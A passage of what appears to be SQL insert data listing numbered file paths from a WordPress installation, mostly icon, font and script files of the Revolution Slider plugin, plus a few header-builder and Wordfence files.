(2695, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_3_24px.svg'),
(2696, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_4_24px.svg'),
(2697, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_5_24px.svg'),
(2698, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_6_24px.svg'),
(2699, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_one_24px.svg'),
(2700, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_two_24px.svg'),
(2701, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_loupe_24px.svg'),
(2702, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_monochrome_photos_24px.svg'),
(2703, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_movie_creation_24px.svg'),
(2704, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_movie_filter_24px.svg'),
(2705, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_music_note_24px.svg'),
(2706, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_nature_24px.svg'),
(2707, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_nature_people_24px.svg'),
(2708, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_navigate_before_24px.svg'),
(2709, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_navigate_next_24px.svg'),
(2710, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_palette_24px.svg'),
(2711, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_24px.svg'),
(2712, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_fish_eye_24px.svg'),
(2713, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_horizontal_24px.svg'),
(2714, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_vertical_24px.svg'),
(2715, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_wide_angle_24px.svg'),
(2716, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_24px.svg'),
(2717, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_album_24px.svg'),
(2718, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_camera_24px.svg'),
(2719, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_filter_24px.svg'),
(2720, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_library_24px.svg'),
(2721, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_actual_24px.svg'),
(2722, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_large_24px.svg'),
(2723, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_small_24px.svg'),
(2724, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_picture_as_pdf_24px.svg'),
(2725, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_portrait_24px.svg'),
(2726, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_remove_red_eye_24px.svg'),
(2727, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_90_degrees_ccw_24px.svg'),
(2728, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_left_24px.svg'),
(2729, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_right_24px.svg'),
(2730, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_slideshow_24px.svg'),
(2731, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_straighten_24px.svg'),
(2732, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_style_24px.svg'),
(2733, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_switch_camera_24px.svg'),
(2734, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_switch_video_24px.svg'),
(2735, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tag_faces_24px.svg'),
(2736, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_texture_24px.svg'),
(2737, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timelapse_24px.svg'),
(2738, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_10_24px.svg'),
(2739, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_24px.svg'),
(2740, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_3_24px.svg'),
(2741, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_off_24px.svg'),
(2742, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tonality_24px.svg'),
(2743, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_transform_24px.svg'),
(2744, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tune_24px.svg'),
(2745, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_view_comfy_24px.svg'),
(2746, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_view_compact_24px.svg'),
(2747, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_vignette_24px.svg'),
(2748, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_auto_24px.svg'),
(2749, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_cloudy_24px.svg'),
(2750, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_incandescent_24px.svg'),
(2751, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_iridescent_24px.svg'),
(2752, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_sunny_24px.svg'),
(2753, 'wp-content/plugins/revslider/public/assets/assets/svg/index.php'),
(2754, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_add_location_24px.svg'),
(2755, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_beenhere_24px.svg'),
(2756, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_24px.svg'),
(2757, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_bike_24px.svg'),
(2758, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_boat_24px.svg'),
(2759, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_bus_24px.svg'),
(2760, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_car_24px.svg'),
(2761, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_railway_24px.svg'),
(2762, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_run_24px.svg'),
(2763, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_subway_24px.svg'),
(2764, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_transit_24px.svg'),
(2765, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_walk_24px.svg'),
(2766, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_edit_location_24px.svg'),
(2767, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_flight_24px.svg'),
(2768, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_hotel_24px.svg'),
(2769, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_layers_24px.svg'),
(2770, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_layers_clear_24px.svg'),
(2771, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_activity_24px.svg'),
(2772, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_airport_24px.svg'),
(2773, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_atm_24px.svg'),
(2774, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_bar_24px.svg'),
(2775, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_cafe_24px.svg'),
(2776, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_car_wash_24px.svg'),
(2777, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_convenience_store_24px.svg'),
(2778, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_dining_24px.svg'),
(2779, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_drink_24px.svg'),
(2780, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_florist_24px.svg'),
(2781, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_gas_station_24px.svg'),
(2782, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_grocery_store_24px.svg'),
(2783, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_hospital_24px.svg'),
(2784, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_hotel_24px.svg'),
(2785, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_laundry_service_24px.svg'),
(2786, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_library_24px.svg'),
(2787, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_mall_24px.svg'),
(2788, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_movies_24px.svg'),
(2789, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_offer_24px.svg'),
(2790, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_parking_24px.svg'),
(2791, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_pharmacy_24px.svg'),
(2792, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_phone_24px.svg'),
(2793, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_pizza_24px.svg'),
(2794, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_play_24px.svg'),
(2795, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_post_office_24px.svg'),
(2796, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_printshop_24px.svg'),
(2797, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_see_24px.svg'),
(2798, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_shipping_24px.svg'),
(2799, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_taxi_24px.svg'),
(2800, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_map_24px.svg'),
(2801, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_my_location_24px.svg'),
(2802, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_navigation_24px.svg'),
(2803, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_near_me_24px.svg'),
(2804, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_person_pin_24px.svg'),
(2805, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_person_pin_circle_24px.svg'),
(2806, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_pin_drop_24px.svg'),
(2807, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_place_24px.svg'),
(2808, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_rate_review_24px.svg'),
(2809, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_restaurant_menu_24px.svg'),
(2810, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_satellite_24px.svg'),
(2811, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_store_mall_directory_24px.svg'),
(2812, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_terrain_24px.svg'),
(2813, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_traffic_24px.svg'),
(2814, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_zoom_out_map_24px.svg'),
(2815, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_apps_24px.svg'),
(2816, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_apps_36px.svg'),
(2817, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_back_24px.svg'),
(2818, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_back_36px.svg'),
(2819, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_downward_24px.svg'),
(2820, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_down_24px.svg'),
(2821, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_down_36px.svg'),
(2822, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_down_circle_24px.svg'),
(2823, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_up_24px.svg'),
(2824, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_up_36px.svg'),
(2825, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_forward_24px.svg'),
(2826, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_forward_36px.svg'),
(2827, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_cancel_24px.svg'),
(2828, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_cancel_36px.svg'),
(2829, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_check_24px.svg'),
(2830, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_check_36px.svg'),
(2831, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_left_24px.svg'),
(2832, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_left_36px.svg'),
(2833, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_right_24px.svg'),
(2834, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_right_36px.svg'),
(2835, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_close_24px.svg'),
(2836, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_close_36px.svg'),
(2837, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_less_24px.svg'),
(2838, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_less_36px.svg'),
(2839, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_more_24px.svg'),
(2840, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_more_36px.svg'),
(2841, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_24px.svg'),
(2842, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_36px.svg'),
(2843, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_exit_24px.svg'),
(2844, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_exit_36px.svg'),
(2845, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_menu_24px.svg'),
(2846, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_menu_36px.svg'),
(2847, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_horiz_24px.svg'),
(2848, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_horiz_36px.svg'),
(2849, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_vert_24px.svg'),
(2850, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_vert_36px.svg'),
(2851, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_refresh_24px.svg'),
(2852, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_refresh_36px.svg'),
(2853, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_subdirectory_arrow_left_24px.svg'),
(2854, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_subdirectory_arrow_right_24px.svg'),
(2855, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_less_24px.svg'),
(2856, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_less_36px.svg'),
(2857, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_more_24px.svg'),
(2858, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_more_36px.svg'),
(2859, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_adb_24px.svg'),
(2860, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_flat_24px.svg'),
(2861, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_flat_angled_24px.svg'),
(2862, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_individual_suite_24px.svg'),
(2863, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_legroom_extra_24px.svg'),
(2864, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_legroom_normal_24px.svg'),
(2865, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_legroom_reduced_24px.svg'),
(2866, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_recline_extra_24px.svg'),
(2867, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_recline_normal_24px.svg'),
(2868, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_bluetooth_audio_24px.svg'),
(2869, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_confirmation_number_24px.svg'),
(2870, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_disc_full_24px.svg'),
(2871, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_do_not_disturb_24px.svg'),
(2872, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_do_not_disturb_alt_24px.svg'),
(2873, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_drive_eta_24px.svg'),
(2874, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_enhanced_encryption_24px.svg'),
(2875, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_event_available_24px.svg'),
(2876, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_event_busy_24px.svg'),
(2877, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_event_note_24px.svg'),
(2878, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_folder_special_24px.svg'),
(2879, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_live_tv_24px.svg'),
(2880, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_mms_24px.svg'),
(2881, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_more_24px.svg'),
(2882, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_network_check_24px.svg'),
(2883, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_network_locked_24px.svg'),
(2884, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_no_encryption_24px.svg'),
(2885, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_ondemand_video_24px.svg'),
(2886, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_personal_video_24px.svg'),
(2887, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_bluetooth_speaker_24px.svg'),
(2888, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_forwarded_24px.svg'),
(2889, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_in_talk_24px.svg'),
(2890, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_locked_24px.svg'),
(2891, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_missed_24px.svg'),
(2892, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_paused_24px.svg'),
(2893, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_power_24px.svg'),
(2894, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_rv_hookup_24px.svg'),
(2895, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sd_card_24px.svg'),
(2896, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sim_card_alert_24px.svg'),
(2897, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sms_24px.svg'),
(2898, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sms_failed_24px.svg'),
(2899, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sync_24px.svg'),
(2900, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sync_disabled_24px.svg'),
(2901, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sync_problem_24px.svg'),
(2902, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_system_update_24px.svg'),
(2903, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_tap_and_play_24px.svg'),
(2904, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_time_to_leave_24px.svg'),
(2905, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_vibration_24px.svg'),
(2906, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_voice_chat_24px.svg'),
(2907, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_vpn_lock_24px.svg'),
(2908, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_wc_24px.svg'),
(2909, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_wifi_24px.svg'),
(2910, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_ac_unit_24px.svg'),
(2911, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_airport_shuttle_24px.svg'),
(2912, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_all_inclusive_24px.svg'),
(2913, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_beach_access_24px.svg'),
(2914, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_business_center_24px.svg'),
(2915, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_casino_24px.svg'),
(2916, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_child_care_24px.svg'),
(2917, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_child_friendly_24px.svg'),
(2918, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_fitness_center_24px.svg'),
(2919, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_free_breakfast_24px.svg'),
(2920, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_golf_course_24px.svg'),
(2921, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_hot_tub_24px.svg'),
(2922, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_kitchen_24px.svg'),
(2923, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_pool_24px.svg'),
(2924, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_room_service_24px.svg'),
(2925, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_smoke_free_24px.svg'),
(2926, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_smoking_rooms_24px.svg'),
(2927, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_spa_24px.svg'),
(2928, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_cake_24px.svg'),
(2929, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_domain_24px.svg'),
(2930, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_group_24px.svg'),
(2931, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_group_add_24px.svg'),
(2932, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_location_city_24px.svg'),
(2933, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_mood_24px.svg'),
(2934, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_mood_bad_24px.svg'),
(2935, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_24px.svg'),
(2936, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_active_24px.svg'),
(2937, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_none_24px.svg'),
(2938, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_off_24px.svg'),
(2939, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_paused_24px.svg'),
(2940, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_pages_24px.svg'),
(2941, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_party_mode_24px.svg'),
(2942, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_people_24px.svg'),
(2943, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_people_outline_24px.svg'),
(2944, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_person_24px.svg'),
(2945, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_person_add_24px.svg'),
(2946, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_person_outline_24px.svg'),
(2947, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_plus_one_24px.svg'),
(2948, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_poll_24px.svg'),
(2949, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_public_24px.svg'),
(2950, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_school_24px.svg'),
(2951, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_share_24px.svg'),
(2952, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_whatshot_24px.svg'),
(2953, 'wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_check_box_24px.svg'),
(2954, 'wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_check_box_outline_blank_24px.svg'),
(2955, 'wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_indeterminate_check_box_24px.svg'),
(2956, 'wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_radio_button_checked_24px.svg'),
(2957, 'wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_radio_button_unchecked_24px.svg'),
(2958, 'wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_star_24px.svg'),
(2959, 'wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_star_border_24px.svg'),
(2960, 'wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_star_half_24px.svg'),
(2961, 'wp-content/plugins/revslider/public/assets/css/index.php'),
(2962, 'wp-content/plugins/revslider/public/assets/fonts/font-awesome/fonts/fontawesome-webfont.svg'),
(2963, 'wp-content/plugins/revslider/public/assets/fonts/font-awesome/index.php'),
(2964, 'wp-content/plugins/revslider/public/assets/fonts/index.php'),
(2965, 'wp-content/plugins/revslider/public/assets/fonts/pe-icon-7-stroke/css/index.php'),
(2966, 'wp-content/plugins/revslider/public/assets/fonts/pe-icon-7-stroke/fonts/Pe-icon-7-stroke.svg'),
(2967, 'wp-content/plugins/revslider/public/assets/fonts/pe-icon-7-stroke/fonts/index.php'),
(2968, 'wp-content/plugins/revslider/public/assets/fonts/pe-icon-7-stroke/index.php'),
(2969, 'wp-content/plugins/revslider/public/assets/fonts/revicons/index.php'),
(2970, 'wp-content/plugins/revslider/public/assets/fonts/revicons/revicons.svg'),
(2971, 'wp-content/plugins/revslider/public/assets/index.php'),
(2972, 'wp-content/plugins/revslider/public/assets/js/extensions/index.php'),
(2973, 'wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.actions.min.js'),
(2974, 'wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.carousel.min.js'),
(2975, 'wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.kenburn.min.js'),
(2976, 'wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.layeranimation.min.js'),
(2977, 'wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.migration.min.js'),
(2978, 'wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.navigation.min.js'),
(2979, 'wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.parallax.min.js'),
(2980, 'wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.slideanims.min.js'),
(2981, 'wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.video.min.js'),
(2982, 'wp-content/plugins/revslider/public/assets/js/index.php'),
(2983, 'wp-content/plugins/revslider/public/assets/js/jquery.themepunch.enablelog.js'),
(2984, 'wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js'),
(2985, 'wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js'),
(2986, 'wp-content/plugins/revslider/public/assets/js/tp-color-picker.min.js'),
(2987, 'wp-content/plugins/revslider/public/index.php'),
(2988, 'wp-content/plugins/revslider/public/revslider-front.class.php'),
(2989, 'wp-content/plugins/revslider/public/views/revslider-page-template.php'),
(2990, 'wp-content/plugins/revslider/release_log.html'),
(2991, 'wp-content/plugins/revslider/revslider.php'),
(2992, 'wp-content/plugins/revslider/uninstall.php'),
(2993, 'wp-content/plugins/us-header-builder/admin/js/header-builder.js'),
(2994, 'wp-content/plugins/us-header-builder/config/meta-boxes.php'),
(2995, 'wp-content/plugins/us-header-builder/config/theme-options.php'),
(2996, 'wp-content/plugins/us-header-builder/functions/ajax.php'),
(2997, 'wp-content/plugins/us-header-builder/templates/htemplates.php'),
(2998, 'wp-content/plugins/us-header-builder/us-header-builder.php'),
(2999, 'wp-content/plugins/us-header-builder/vendor/usof/templates/fields/header_builder.php'),
(3000, 'wp-content/plugins/wordfence/crypto/vendor/autoload.php'),
(3001, 'wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php'),
(3002, 'wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE'),
(3003, 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php'),
(3004, 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php'),
(3005, 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php'),
